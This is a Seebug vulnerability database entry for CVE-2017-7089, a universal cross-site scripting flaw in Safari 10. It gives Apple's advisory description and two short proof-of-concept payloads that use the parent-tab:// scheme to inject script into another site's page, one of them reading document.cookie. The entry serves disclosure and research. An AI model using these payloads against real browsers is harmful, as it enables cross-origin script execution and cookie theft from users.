Lucene search

K
seebugRootSSV:96616
HistoryOct 09, 2017 - 12:00 a.m.

Apple Safari uxss(CVE-2017-7089)

2017-10-0900:00:00
Root
www.seebug.org
26

0.006 Low

EPSS

Percentile

77.0%

CVE-2017-7089

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management.

Safari 10

Local SOP bypass
&lt;script&gt; function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='<img src>';}&lt;/script&gt;&lt;button onclick=Pew();&gt;Click me!&lt;/button&gt;
Exploit by Frans RosΓ©n
data:text/html,&lt;script&gt;function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='&lt;img/src=""onerror="alert(document.cookie)"&gt;'};setTimeout(y,100)&lt;/script&gt;